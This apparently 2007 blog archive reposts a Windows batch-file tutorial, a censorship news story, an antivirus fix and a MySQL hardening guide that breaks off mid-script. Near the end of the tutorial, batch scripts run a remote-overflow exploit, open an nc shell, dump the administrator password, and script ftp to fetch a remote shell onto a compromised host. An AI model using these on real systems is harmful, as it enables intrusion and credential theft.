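Tuesday, June 26, 2007

[Repost] A Detailed Guide to Writing BAT Files

First, a batch file is a text file in which every line is a DOS command (most of the time exactly like the command lines we run at the DOS prompt). You can create and modify batch files with any text editor, such as Edit under DOS or Notepad under Windows.

Second, a batch file is a simple program. It can control the flow of command execution with the conditional statement (if) and the flow-control statement (goto), and it can use the loop statement (for) to run a command repeatedly. Of course, the programming power of batch files is very limited compared with languages such as C, and also quite irregular. The statements of a batch program are simply DOS commands (internal and external), and what a batch file can do depends mainly on the commands you use.

Third, every finished batch file is equivalent to a DOS external command. You can add its directory to your DOS search path (path) so that it can be run from any location. A good habit is to create a bat or batch directory on the hard disk (for example C:\BATCH) and put all the batch files you write there; once c:\batch is in the path, you can run all of them from anywhere.

Fourth, under DOS and Win9x/Me, the AUTOEXEC.BAT file in the root of drive C: is the automatic startup batch file. It runs every time the system starts, so you can put into it the commands that must run at every startup, such as setting the search path, loading the mouse driver and disk cache, and setting system environment variables. Below is a sample autoexec.bat for Windows 98: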

@ECHO OFF

PATH C:\WINDOWS;C:\WINDOWS\COMMAND;C:\UCDOS;C:\DOSTools;C:\SYSTOOLS;C:\WINTOOLS;C:\BATCH

LH SMARTDRV.EXE /X

LH DOSKEY.COM /INSERT

LH CTMOUSE.EXE

SET TEMP=D:\TEMP

SET TMP=D:\TEMP

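What batch files are for

Put simply, a batch file automatically runs several commands one after another.

Let us start with the simplest application. To start the WPS software you must run the following every time (the text before > is the DOS prompt):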

C:\>cd wps

C:\WPS>spdos

C:\WPS>py

C:\WPS>wbx

C:\WPS>wps

Doing this every time before using WPS is tedious, isn't it?

With a batch file these tedious steps become simple. First we write a batch file runwps.bat with the following content:

@echo off

c:

cd\wps

spdos

py

wbx

wps

cd\

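From now on, to enter WPS we only need to run the runwps batch file.

Common commands

echo, @, call, pause and rem (tip: :: can be used in place of rem) are the most commonly used commands in batch files, so we start with them.

echo displays the characters that follow the command

echo off means that the command lines of all commands run after this statement are not displayed

@ is similar to echo off, but it is placed at the very beginning of a command line and means that this line's command line is not displayed when it runs (it affects only the current line).

call calls another batch file (if you invoke another batch file directly without call, then after that batch file finishes, control cannot return to the current file to run its remaining commands).

pause suspends execution of the batch file, displays the prompt Press any key to continue... and waits for the user to press any key before continuing

rem marks the characters after the command as a remark (comment) that is not executed; it is only for your own future reference (like a comment in a program).

Example 1: use edit to create the file a.bat, type in the following and save it as c:\a.bat. Running this batch file writes the list of all files in the root directory to a.txt, starts UCDOS, enters WPS, and so on.

  Batch file content:         Command notes:

@echo off                     Do not display the following command lines or this one

dir c:\*.* >a.txt             Write the file list of drive C to a.txt

call c:\ucdos\ucdos.bat       Call ucdos

echo 你好                     Display "你好"

pause                         Pause and wait for a key press

rem about to run wps          Comment: about to run wps

cd ucdos                      Enter the ucdos directory

wps                           Run wps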

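Batch file parameters

Like a function in C, a batch file can take parameters (equivalent to the command-line arguments of a DOS command). This uses the parameter marker "%".

%[1-9] denotes a parameter. Parameters are the strings, separated by spaces (or tabs), that follow the file name when the batch file is run. The variables range from %0 to %9: %0 is the batch command itself, and the other parameter strings are represented in order by %1 to %9.

Example 2: the root directory of C: contains a batch file named f.bat with the following content: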

@echo off

format %1

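If you run C:\>f a:

then while f.bat runs, %1 stands for a:, so format %1 is equivalent to format a:, and what the command above actually executes is format a:

Example 3: the root directory of C: contains a batch file named t.bat with the following content: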

@echo off

type %1

type %2

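Then running C:\>t a.txt b.txt

%1 : stands for a.txt

%2 : stands for b.txt

so the command above displays the contents of a.txt and b.txt in turn.

Special commands

if, goto, choice and for are the more advanced commands in batch files. If you are fluent with these, you are a batch file expert.

I. if is the conditional statement. It tests whether a given condition holds and decides which command to run accordingly. It has three forms:

1. if [not] "parameter" == "string" command

If the parameter equals the specified string (not means not equal; the same applies below), the condition holds and the command is run; otherwise execution continues with the next line.

Example: if "%1"=="a" format a:

2. if [not] exist [path\]filename command

If the specified file exists, the condition holds and the command is run; otherwise execution continues with the next line.

For example: if exist c:\config.sys type c:\config.sys

means that if the file c:\config.sys exists, its contents are displayed.

3. if errorlevel <number> command

Many DOS programs return a numeric value when they finish, indicating the result (or status) of the run. The if errorlevel command tests a program's return value so that different commands can be run for different return values (the return values must be tested in descending order). If the return value equals the specified number, the condition holds and the command is run; otherwise execution continues with the next line.

For example: if errorlevel 2 goto x2

II. goto: when the batch file reaches this point, it jumps to the label specified by goto (a label is defined by : followed by a standard string). goto is normally used together with if, to run different groups of commands under different conditions.

For example: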

goto end

:end

echo this is the end

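Labels are defined as ":string"; the line containing the label is not executed.

III. choice: this command lets the user enter one character (to make a selection) and returns a different errorlevel according to the user's choice; combined with if errorlevel, different commands are then run according to that choice.

Note: choice is an external command supplied with DOS or Windows. Its syntax differs slightly between versions; use choice /? to see the usage.

Syntax of the choice command (this is the syntax of choice in Windows 2003; other versions are broadly similar):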

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]

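Description:

This tool allows users to select one item from a list of choices and returns the index of the selected choice.

Parameter list:

/C choices   Specifies the list of choices to be created. The default list is "YN".

/N           Hides the list of choices in the prompt. The message before the prompt is displayed and the choices are still enabled.

/CS          Enables case-sensitive choices to be selected. By default, the tool is case-insensitive.

/T timeout   The number of seconds to pause before a default choice is made. Acceptable values are from 0 to 9999. If 0 is specified, there is no pause and the default choice is selected.

/D choice    Specifies the default choice after nnnn seconds. The character must be in the set of choices specified by the /C option, and nnnn must also be specified with /T.

/M text      Specifies the message to be displayed before the prompt. If not specified, the tool displays only a prompt.

/?           Displays the help message.

Note:

The ERRORLEVEL environment variable is set to the index of the key that was selected from the set of choices. The first choice listed returns a value of 1, the second a value of 2, and so on. If the user presses a key that is not a valid choice, the tool sounds a warning beep. If the tool detects an error condition, it returns an ERRORLEVEL value of 255. If the user presses Ctrl+Break or Ctrl+C, the tool returns an ERRORLEVEL value of 0. When you use ERRORLEVEL parameters in a batch program, list them in decreasing order.

Examples: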

CHOICE /?

CHOICE /C YNC /M "确认请按 Y,否请按 N,或者取消请按 C。"

CHOICE /T 10 /C ync /CS /D y

CHOICE /C ab /M "选项 1 请选择 a,选项 2 请选择 b。"

CHOICE /C ab /N /M "选项 1 请选择 a,选项 2 请选择 b。"

If I run the command: CHOICE /C YNC /M "确认请按 Y,否请按 N,或者取消请按 C。"

the screen shows:

确认请按 Y,否请按 N,或者取消请按 C。 [Y,N,C]?

Example: test.bat contains the following (note that when testing return values with if errorlevel, they must be listed from highest to lowest):

@echo off

choice /C dme /M "defrag,mem,end"

if errorlevel 3 goto end

if errorlevel 2 goto mem

if errorlevel 1 goto defrag

:defrag

c:\dos\defrag

goto end

:mem

mem

goto end

:end

echo good bye

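When this batch file runs it displays "defrag,mem,end[D,M,E]?". The user can choose d, m or e, and the if statements then act on the choice: d runs the section labelled defrag, m runs the section labelled mem, and e runs the section labelled end. Each section ends with goto end, which jumps to the end label; the program then displays good bye and the batch file finishes.

IV. for is the loop command. As long as the condition is met, it runs the same command repeatedly.

Syntax:

Runs a specified command for each file in a set of files.

FOR %%variable IN (set) DO command [command-parameters]

%%variable           Specifies a single-letter replaceable parameter.

(set)                Specifies a set of one or more files. Wildcards may be used.

command              Specifies the command to carry out for each file.

command-parameters   Specifies parameters or switches for the specified command.

For example, if a batch file contains the line: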

for %%c in (*.bat *.txt) do type %%c

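then this command line displays the contents of all files in the current directory with the extensions bat and txt.

Batch file examples

1. IF-EXIST

1)

First use Notepad to create a batch file test1.bat in C:\ with the following content: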

@echo off

IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT

IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist

Then run it:

C:\>TEST1.BAT

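If the file AUTOEXEC.BAT exists in C:\, its contents are displayed; if it does not exist, the batch file tells you that the file does not exist.

2)

Next create another file, test2.bat, with the following content: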

@ECHO OFF

IF EXIST \%1 TYPE \%1

IF NOT EXIST \%1 ECHO \%1 does not exist

Run:

C:\>TEST2 AUTOEXEC.BAT

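The result of this command is the same as above.

Notes:

(1) IF EXIST tests whether a file exists. Its format is

IF EXIST [path + filename] command

(2) The %1 in test2.bat is a parameter. DOS allows nine batch parameters to be passed to a batch file, %1 to %9 (%0 is the test2 command itself). This is somewhat like the relationship between actual and formal parameters in programming: %1 is the formal parameter and AUTOEXEC.BAT is the actual parameter.

3) Going a step further, create a file named TEST3.BAT with the following content: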

@echo off

IF "%1" == "A" ECHO XIAO

IF "%2" == "B" ECHO TIAN

IF "%3" == "C" ECHO XIN

If you run:

C:\>TEST3 A B C

the screen shows:

XIAO

TIAN

XIN

If you run:

C:\>TEST3 A B

the screen shows

XIAO

TIAN

While this command runs, DOS assigns an empty string to the parameter %3.

2. IF-ERRORLEVEL

Create TEST4.BAT with the following content:

@ECHO OFF

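XCOPY C:\AUTOEXEC.BAT D:

IF ERRORLEVEL 1 ECHO 文件拷贝失败

IF NOT ERRORLEVEL 1 ECHO 成功拷贝文件

Then run the file:

C:\>TEST4

If the copy succeeds, the screen shows "成功拷贝文件" (file copied successfully); otherwise it shows "文件拷贝失败" (file copy failed).

IF ERRORLEVEL tests the return value of the preceding DOS command. Note that it is only the return value of the immediately preceding command, and the return values must be tested in order from largest to smallest. The following batch file is therefore wrong: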

@ECHO OFF

XCOPY C:\AUTOEXEC.BAT D:\

IF ERRORLEVEL 0 ECHO 成功拷贝文件

IF ERRORLEVEL 1 ECHO 未找到拷贝文件

IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作

IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作

IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误

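Whether or not the copy succeeds, the messages that follow:

未找到拷贝文件 (file to copy not found)

用户通过ctrl-c中止拷贝操作 (user aborted the copy with ctrl-c)

预置错误阻止文件拷贝操作 (initialization error prevented the file copy)

拷贝过程中写盘错误 (disk write error during copy)

will all be displayed.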

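Below are the return values of several common commands and their meanings:

backup

0 Backup succeeded

1 No files found to back up

2 File sharing conflict prevented the backup from completing

3 User aborted the backup with ctrl-c

4 Backup aborted because of a fatal error

diskcomp

0 Disks compare identical

1 Disks compare different

2 User aborted the comparison with ctrl-c

3 Comparison aborted because of a fatal error

4 Initialization error aborted the comparison

diskcopy

0 Disk copy succeeded

1 Non-fatal disk read/write error

2 User ended the copy with ctrl-c

3 Disk copy aborted because of a fatal processing error

4 Initialization error prevented the copy

format

0 Format succeeded

3 User aborted the format with ctrl-c

4 Format aborted because of a fatal processing error

5 User ended by typing n at the prompt "proceed with format(y/n)?"

xcopy

0 Files copied successfully

1 No files found to copy

2 User aborted the copy with ctrl-c

4 Initialization error prevented the file copy

5 Disk write error during copy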

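3. IF STRING1 == STRING2

Create TEST5.BAT with the following content:

@echo off

IF "%1" == "A" FORMAT A:

Run:

C:\>TEST5 A

The screen then asks whether to format drive A:.

Note: to guard against an empty parameter, the strings are normally enclosed in double quotes (or other symbols; note that reserved symbols cannot be used).

For example: if [%1]==[A] or if %1*==A*

5. GOTO

Create TEST6.BAT with the following content: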

@ECHO OFF

IF EXIST C:\AUTOEXEC.BAT GOTO _COPY

GOTO _DONE

:_COPY

COPY C:\AUTOEXEC.BAT D:\

:_DONE

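Notes:

(1) The label is preceded by the ASCII colon ":", and there must be no space between the colon and the label.

(2) Labels follow the same naming rules as file names.

(3) DOS supports labels of at most eight characters; when two labels cannot be told apart, the jump goes to the nearest one.

6. FOR

Create C:\TEST7.BAT with the following content: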

@ECHO OFF

FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C

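Run:

C:\>TEST7

After it runs, the screen shows the contents of all files in the root directory of drive C: with the extensions BAT, TXT and SYS (hidden files not included).

Tips for batch (BAT) files on the Windows 2000 command line

Article structure

1. Help for all built-in commands

2. The concept of environment variables

3. Built-in special symbols (take care to avoid them in practice)

4. Basic batch file concepts

5. Appendix 1: tmp.txt

6. Appendix 2: sample.bat

###########################

1. Help for all built-in commands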

###########################

ver

cmd /?

set /?

rem /?

if /?

echo /?

goto /?

for /?

shift /?

call /?

Other commonly needed commands

type /?

find /?

findstr /?

copy /?

The following writes all of the help above to one file

echo ver >tmp.txt

ver >>tmp.txt

echo cmd /? >>tmp.txt

cmd /? >>tmp.txt

echo rem /? >>tmp.txt

rem /? >>tmp.txt

echo if /? >>tmp.txt

if /? >>tmp.txt

echo goto /? >>tmp.txt

goto /? >>tmp.txt

echo for /? >>tmp.txt

for /? >>tmp.txt

echo shift /? >>tmp.txt

shift /? >>tmp.txt

echo call /? >>tmp.txt

call /? >>tmp.txt

echo type /? >>tmp.txt

type /? >>tmp.txt

echo find /? >>tmp.txt

find /? >>tmp.txt

echo findstr /? >>tmp.txt

findstr /? >>tmp.txt

echo copy /? >>tmp.txt

copy /? >>tmp.txt

type tmp.txt

#############################

2. The concept of environment variables

#############################

C:\Program Files>set

ALLUSERSPROFILE=C:\Documents and Settings\All Users

CommonProgramFiles=C:\Program Files\Common Files

COMPUTERNAME=FIRST

ComSpec=C:\WINNT\system32\cmd.exe

NUMBER_OF_PROCESSORS=1

OS=Windows_NT

Os2LibPath=C:\WINNT\system32\os2\dll;

Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel

PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0605

ProgramFiles=C:\Program Files

PROMPT=$P$G

SystemDrive=C:

SystemRoot=C:\WINNT

TEMP=C:\WINNT\TEMP

TMP=C:\WINNT\TEMP

USERPROFILE=C:\Documents and Settings\Default User

windir=C:\WINNT

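path: the search path for executable programs. My suggestion is to copy your program into the %windir%\system32\. directory, where it will normally be found automatically.

Syntax: copy mychenxu.exe %windir%\system32\.

Using the dot (.) makes it clear at a glance

References to environment variables use (English-mode, half-width) double quotes

%windir% variable

%%windir%% second-level variable reference.

Other ones we often use:

%temp% temporary files directory

%windir% system directory

%errorlevel% exit code

Write output files to the temporary files directory; this keeps the current directory tidy.

For arguments that contain spaces, you should learn to use double quotes (""), for example when working with the Program Files folder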

C:\>dir p*

C:\ 的目录

2000-09-02 11:47 2,164 PDOS.DEF

1999-01-03 00:47 <DIR> Program Files

1 个文件 2,164 字节

1 个目录 1,505,997,824 可用字节

C:\>cd pro*

C:\Program Files>

C:\>

C:\>cd "Program Files"

C:\Program Files>

############################################

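3. Built-in special symbols (take care to avoid them in practice)

############################################

Microsoft builds in the following characters, which cannot be used in the names of files you create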

con nul aux \ / | || && ^ > < *

You can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples:

(In short: either use ^ as the leading escape character, or use double quotes "".)

To create the variable value new&name, type:

set varname=new^&name

To create the variable value "new&name", type:

set varname="new&name"

The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments.

find "Pacific Rim" <> nwtrade.txt

IF EXIST filename. (del filename.) ELSE echo filename. missing

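> creates a file

>> appends to the end of a file

@ prefix character: the line is not displayed in cmd when it runs; echo off can be used to turn the display off

^ leading (escape) character for the special symbols ( > < &). The first line below only displays aaa; the second writes to the file bbb

echo 123456 ^> aaa

echo 1231231 > bbb

() groups commands

(echo aa & echo bb)

, a default separator, the same as a space.

; comment: what follows is a comment

: marks a label

| pipe

& Usage: command1 & command2 [& command3...]

This way several commands can be run at once, whether or not each command succeeds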

dir c:\*.exe & dir d:\*.exe & dir e:\*.exe

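&& Usage: command1 && command2 [&& command3...]

When a command fails, the commands after it are not run; if no command fails, all commands are run to the end.

|| Usage: command1 || command2 [|| command3...]

When a command succeeds, the commands after it are not run; if no command succeeds, all commands are run to the end.

Common syntax forms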

IF [NOT] ERRORLEVEL number command para1 para2

IF [NOT] string1==string2 command para1 para2

IF [NOT] EXIST filename command para1 para2

IF EXIST filename command para1 para2

IF NOT EXIST filename command para1 para2

IF "%1"=="" goto END

IF "%1"=="net" goto NET

IF NOT "%2"=="net" goto OTHER

IF ERRORLEVEL 1 command para1 para2

IF NOT ERRORLEVEL 1 command para1 para2

FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k

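The tokens are assigned to variables in alphabetical order: i j k l m n o p q.

eol=c - specifies an end-of-line comment character (just one)

skip=n - specifies the number of lines to skip at the beginning of the file.

delims=xxx - specifies a delimiter set. This replaces the default delimiter set of space and tab.

########################

4. Basic batch file concepts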

########################

echo This is test > a.txt

type a.txt

echo This is test 11111 >> a.txt

type a.txt

echo This is test 22222 > a.txt

type a.txt

The second echo appends

The third echo empties a.txt and creates it again

netstat -n | find "3389"

This lists the IP addresses of all users connected to port 3389.

________________test.bat______

@echo please care

echo plese care 1111

echo plese care 2222

echo plese care 3333

@echo please care

@echo plese care 1111

@echo plese care 2222

@echo plese care 3333

rem the comment text is not displayed, but this line is echoed

@rem the comment text is not displayed, and this line is not echoed

@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)

@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)

_____________________________

Next we take a concrete example: the idahack program, that is, the ida remote overflow. It should be quite simple.

___________________ida.bat_____

@rem ver 1.0

@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"

@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"

@if "%1" =="" goto USAGE

@if NOT "%2" =="" goto SP2

:start

@echo Now start ...

@ping %1

@echo chinese win2k:1 sp1:2 sp2:3

idahack.exe %1 80 1 99 >%temp%\_tmp

@echo "prog exit code [%errorlevel%] idahack.exe"

@type %temp%\_tmp

@find "good luck :)" %temp%\_tmp

@echo "prog exit code [%errorlevel%] find [goog luck]"

@if NOT errorlevel 1 nc.exe %1 99

@goto END

:SP2

@idahack.exe %1 80 %2 99 %temp%\_tmp

@type %temp%\_tmp

@find "good luck :)" %temp%\_tmp

@if NOT errorlevel 1 nc.exe %1 99

@goto END

:USAGE

@echo Example: ida.bat IP

@echo Example: ida.bat IP (2,3)

:END

_____________________ida.bat__END_______

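Now for a second file, which obtains the administrator password.

Most people say they cannot get it. In fact they simply did not enter the correct information.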

___________________________fpass.bat____________________________________________

@rem ver 1.0

@if NOT exist %windir %\system32\findpass.exe echo "ERROR: dont find findpass.exe"

@if NOT exist %windir %\system32\pulist.exe echo "ERROR: dont find pulist.exe"

@echo start....

@echo ____________________________________

@if "%1"=="" goto USAGE

@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt

@echo "prog exit code [%errorlevel%] findpass.exe"

@type %temp%\_findpass.txt

@echo ________________________________Here__pass★★★★★★★★

@ipconfig /all >>%temp%\_findpass.txt

@goto END

:USAGE

@pulist.exe >%temp%\_pass.txt

@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt

@echo "Example: fpass.bat %1 %2 %3 %4 !!!"

@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"

:END

@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "

@echo " fpass.bat end [%errorlevel%] !"

_________________fpass.bat___END___________________________________________________________

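One more case: you are already logged in to a remote host through telnet. How do you upload files (win)?

Type the following into the window, line by line. Of course you can also copy it all and paste it with Ctrl+V. Then just wait!!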

echo open 210.64.x.4 3396>w

echo read>>w

echo read>>w

echo cd winnt>>w

echo binary>>w

echo pwd >>w

echo get wget.exe >>w

echo get winshell.exe >>w

echo get any.exe >>w

echo quit >>w

ftp -s:w

Wednesday, June 20, 2007

[Repost] Blocked China Web users rage against Great Firewall

An internet user browses for information on the Chinese version of search engine Google in Beijing in this January 25, 2006 file photo. China employs a complex system of filters and an army of tens of thousands of human monitors to survey the country's 140 million Internet users' surfing habits and surgically clip sensitive content from in front of their eyes. (REUTERS/Stringer/Files)


June 20, 2007

BEIJING (Reuters) - Yang Zhou is no cyberdissident, but recent curbs on his Web surfing habits by China's censors have him fomenting discontent about China's "Great Firewall."

Yang's fury erupted a few days ago when he found he could not browse his friend's holiday snaps on Flickr.com, due to access restrictions by censors after images of the 1989 Tiananmen Square massacre were posted on the photo-sharing Web site.

"Once you've complained all you can to your friends, what more can you do? What else is there but anger and disillusionment?" Yang said after venting his anger with friends at a hot-pot restaurant in Beijing.

The blocking of Flickr is the latest casualty of China's ongoing battle to control its sprawling Internet. Wikipedia, and a raft of other popular Web sites, discussion boards and blogs have already fallen victim to the country's censors.

China employs a complex system of filters and an army of tens of thousands of human monitors to survey the country's 140 million Internet users' surfing habits and surgically clip sensitive content from in front of their eyes.

Its stability-obsessed government says the surveillance machinery, commonly known as the "Great Firewall," is necessary to let Internet users enjoy a "healthy" online environment and build a "harmonious" society.

Yang just thinks it's a pain.

"I just want to look at some photos! What's wrong with that?" said the 24-year-old accountant, typical of millions of young urban-dwelling professionals who are increasingly aware of and fed up with state intrusions into their private life.

Privacy, once regarded with suspicion in pre-reform China, has become a sought-after commodity among China's burgeoning middle class, according to Nicholas Bequelin from Hong Kong-based Human Rights Watch.

"Of course, it's the first thing people seek when they have the economic resources," Bequelin said. "We see this growing in China in the wake of ideas of ownership and property."

PRIVACY BATTLES

Away from cyberspace, the battle for privacy between China's secretive government and its increasingly active citizens has turned violent in recent months.

In Bobai county, in the southern region of Guangxi, hundreds of farmers smashed government offices and burnt cars after local officials imposed punitive fines on residents who had defied family planning laws and had too many children.

The battle for control of China's Internet, however, will remain much more covert than confrontational, according to Liu Bin, an IT consultant with Beijing-based consulting firm BDA.

He believes it will take a long time before the government loosens control over web content, especially because the Internet-savvy middle class is unlikely to take to the streets -- like the farmers of Bobai county -- over lack of web access.

"Many educated people feel they can accept the current status quo because it doesn't have much impact on their daily lives ... They have been living with government propaganda for over 1,000 years," Liu said.

Such an attitude grates on Du Dongjin, a 40 year-old IT worker in Shanghai.

Du has decided to sue his Internet service provider, the Shanghai branch of state-owned behemoth China Telecom, who he said had blocked a Web site that had carried financial software he hoped to market.

"If the court authorities aren't influenced and they can hear the case fairly, I will win," Du said.

ANONYMOUS GRIEVANCES

Most frustrated Web surfers, however, would rather air their grievances in the relatively safe realms of Internet anonymity.

They still have their anonymity because a state push to have China's millions of bloggers register with their real names to ensure they only posted "responsible" Web content was abandoned after an outcry from the Internet industry and due to the impossible task of keeping lists of exploding numbers of users.

"The thirst for information in China is so strong, it is very difficult for the (Communist) Party to stay ahead of the curve," Bequelin explained.

Within days of the blocking of Flickr, links to browser plug-ins and how-to explanations to subvert the filters and see Flickr photos were gleefully posted on blogs and in chat-rooms.

Many posts were preceded by tirades against the censors for "harmonizing" Flickr.

One blogger posted an image of a voodoo doll, calling it the Great Firewall and inviting users to -- digitally -- stick pins in it.

Yang said restrictions on Flickr probably wouldn't motivate him to write a blog, much less push him down the road of "potentially dangerous" activism.

But he liked the idea of the Great Firewall voodoo doll.

"Have you got the link? Maybe I'll go stick a pin in it," he said.

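Friday, May 25, 2007

Official fix for Norton's false-positive removal of netapi32.dll

For enterprises and individuals whose system files were wrongly deleted after downloading the faulty virus definitions, Symantec has officially published a fix, covering both servers and clients.
Temporary fix for Backdoor.haxdoor

  Version: 1.4

  On Windows XP SP2 Simplified Chinese with patch KB924270 installed, once SAV has updated to the May 17 virus definitions it treats C:\windows\system32\netapi32.dll and C:\windows\system32\lsasrv.dll as backdoor.haxdoor and quarantines them. After a reboot the machine cannot enter the system, safe mode included, and shows a blue screen.

  Servers

  Run LiveUpdate immediately to update to the latest virus definitions (20070517.v73).

  If LiveUpdate has problems, go from here to folder 68645 or a later one, download the file with the xdb extension, and put it in the SAV installation folder on the server (a shared folder, usually C:\program files\SAV or C:\program files\SAV\symantec antivirus. If the server has software such as winzip installed, the XDB file may be renamed to zip or rar and must be renamed back to xdb).

  Clients

  Clients can download the updated virus definitions from the server. For clients that cannot update automatically from the server, go from here to folder 68645 or a later one, download the ****x86.exe file, and run it locally to update the virus definitions. On computers that had this problem, in theory once SAV has downloaded the updated definitions it scans the quarantine, finds the falsely flagged dll files, repairs them automatically and restores them to their original location; many users have already confirmed this.

  To be on the safe side, however, users are advised, workload permitting, to replace these two files under C:\windows\system32 with the netapi32.dll and lsasrv.dll files from the i386 directory of the Windows XP CD.

  For computers that already show a blue screen:

  1. Boot from the Windows XP installation CD

  2. Enter the Recovery Console.

  3. Replace the files under system32 and under dllcache with the netapi32.dll and lsasrv.dll files from the I386 directory of the installation CD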

  a. cd \windows\system32

  b. expand (CD drive letter):\i386\netapi32.dl_

  c. expand (CD drive letter):\i386\lsasrv.dl_

  d. cd dllcache

  e. expand (CD drive letter):\i386\netapi32.dl_

  f. expand (CD drive letter):\i386\lsasrv.dl_

  4. Restart the computer

  5. Update to the new virus definitions described above.

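Tuesday, May 22, 2007

[Repost] MySQL Database Security Configuration Explained in Detail

  MySQL is a fully networked, cross-platform relational database system, and a distributed database management system with a client/server architecture. It is powerful, easy to use and manage, fast, secure and reliable. Users can write programs that access MySQL databases in many languages; paired with PHP in particular it is a golden combination and very widely used.

  Because MySQL is a multi-platform database, its default configuration has to work in all kinds of situations, so in our own environment we should harden it further. As MySQL system administrators, we are responsible for maintaining the security and integrity of the data in the MySQL database system.

  MySQL security configuration has to be approached from two sides, internal system security and external network security. We will also briefly cover some issues to watch for when programming, and a few tips.

2. Internal system security:

  First, a brief introduction to the MySQL database directory structure. Once MySQL is installed and the mysql_install_db script has been run, the data directory is created and the databases are initialized. If we install from the MySQL source package and the installation directory is /usr/local/mysql, the data directory will normally be /usr/local/mysql/var. The database system consists of a series of databases, and each database contains a series of tables. MySQL creates a database directory in the data directory named after the database, and each table is stored in that directory as three files named after the table, with the extensions MYD, MYI and frm.

  MySQL's grant tables provide flexible access control for the databases, but if a local user has read permission on the database files, an attacker only needs to pack up the database directory, copy it away, and place it in the data directory on his own machine to access the stolen database. The security of the host running MySQL is therefore the first concern: if the host is insecure and under an attacker's control, MySQL security is out of the question. Next comes the security of the data directory and data files, that is, their permission settings.

  Judging from some old binary distributions on the main MySQL site, the data directory mode in 3.21.xx is 775, which is very dangerous: any local user can read the data directory, so the database files are not safe. In 3.22.xx the mode is 770, which is still somewhat dangerous: local users in the same group can both read and write, so the data files are not safe either. In 3.23.xx the mode is 700, which is better: only the user that starts the database can read and write the database files, which keeps the local data files safe.

  If the user that starts the MySQL database is mysql, then directories and files like the following are safe. Note the attributes of the data directory and everything under it: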

shell>ls -l /usr/local/mysql
total 40
drwxrwxr-x 2 root root 4096 Feb 27 20:07 bin
drwxrwxr-x 3 root root 4096 Feb 27 20:07 include
drwxrwxr-x 2 root root 4096 Feb 27 20:07 info
drwxrwxr-x 3 root root 4096 Feb 27 20:07 lib
drwxrwxr-x 2 root root 4096 Feb 27 20:07 libexec
drwxrwxr-x 3 root root 4096 Feb 27 20:07 man
drwxrwxr-x 6 root root 4096 Feb 27 20:07 mysql-test
drwxrwxr-x 3 root root 4096 Feb 27 20:07 share
drwxrwxr-x 7 root root 4096 Feb 27 20:07 sql-bench
drwx------ 4 mysql mysql 4096 Feb 27 20:07 var
shell>ls -l /usr/local/mysql/var
total 8
drwx------ 2 mysql mysql 4096 Feb 27 20:08 mysql
drwx------ 2 mysql mysql 4096 Feb 27 20:08 test
shell>ls -l /usr/local/mysql/var/mysql
total 104
-rw------- 1 mysql mysql 0 Feb 27 20:08 columns_priv.MYD
-rw------- 1 mysql mysql 1024 Feb 27 20:08 columns_priv.MYI
-rw------- 1 mysql mysql 8778 Feb 27 20:08 columns_priv.frm
-rw------- 1 mysql mysql 302 Feb 27 20:08 db.MYD
-rw------- 1 mysql mysql 3072 Feb 27 20:08 db.MYI
-rw------- 1 mysql mysql 8982 Feb 27 20:08 db.frm
-rw------- 1 mysql mysql 0 Feb 27 20:08 func.MYD
-rw------- 1 mysql mysql 1024 Feb 27 20:08 func.MYI
-rw------- 1 mysql mysql 8641 Feb 27 20:08 func.frm
-rw------- 1 mysql mysql 0 Feb 27 20:08 host.MYD
-rw------- 1 mysql mysql 1024 Feb 27 20:08 host.MYI
-rw------- 1 mysql mysql 8958 Feb 27 20:08 host.frm
-rw------- 1 mysql mysql 0 Feb 27 20:08 tables_priv.MYD
-rw------- 1 mysql mysql 1024 Feb 27 20:08 tables_priv.MYI
-rw------- 1 mysql mysql 8877 Feb 27 20:08 tables_priv.frm
-rw------- 1 mysql mysql 428 Feb 27 20:08 user.MYD
-rw------- 1 mysql mysql 2048 Feb 27 20:08 user.MYI
-rw------- 1 mysql mysql 9148 Feb 27 20:08 user.frm


  If the owner and mode of these files are different, fix them with the following two commands:

shell>chown -R mysql.mysql /usr/local/mysql/var
shell>chmod -R go-rwx /usr/local/mysql/var
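
A read-only audit to run before and after the two commands above, as an added example that is not part of the original article: it lists every entry under the data directory that still grants access to group or others (the 775 and 770 cases described earlier) or is not owned by the expected account. The function names and the temporary demo tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original article. audit_datadir and
# make_demo_tree are hypothetical names; the demo tree is constructed.

# audit_datadir DIR OWNER
#   PERM  <path>  entry grants some access to group or others
#   OWNER <path>  entry is not owned by OWNER (user name or numeric uid)
# Exit status: 0 = clean, 1 = findings printed, 2 = usage error.
# Symbolic links are skipped in the PERM check because their own mode bits
# carry no meaning.
audit_datadir() {
    dir=$1
    owner=$2
    if [ -z "$owner" ] || [ ! -d "$dir" ]; then
        echo "usage: audit_datadir DIR OWNER" >&2
        return 2
    fi
    report=$(
        {
            find "$dir" ! -type l \( -perm -040 -o -perm -020 -o -perm -010 \
                -o -perm -004 -o -perm -002 -o -perm -001 \) -print |
                sed 's/^/PERM  /'
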